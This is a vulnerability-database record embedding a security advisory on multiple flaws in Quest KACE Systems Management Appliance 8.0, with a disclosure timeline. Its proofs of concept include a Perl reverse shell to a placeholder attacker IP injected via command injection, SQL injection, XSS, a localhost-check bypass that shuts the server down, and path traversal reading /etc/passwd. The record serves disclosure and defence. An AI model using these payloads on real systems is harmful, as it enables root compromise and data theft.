Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11134",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-11281",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11134",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"id": "VAR-201805-0594",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
}
]
},
"last_update_date": "2023-12-18T12:01:57.726000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementAppliance design vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131639"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81232"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-640",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11134"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/640.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.357000",
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"date": "2018-06-29T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"date": "2018-06-29T18:50:40.227000",
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Vulnerable to password management",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
],
"trust": 0.6
}
}
VAR-201805-0598
Vulnerability from variot - Updated: 2023-12-18 12:01The '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system. Quest KACE Systems Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance provides comprehensive system management for all network connected devices. A command injection vulnerability exists in the '/common/download_agent_installer.php' script in QuestKACESystemManagementAppliance8.0.318. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
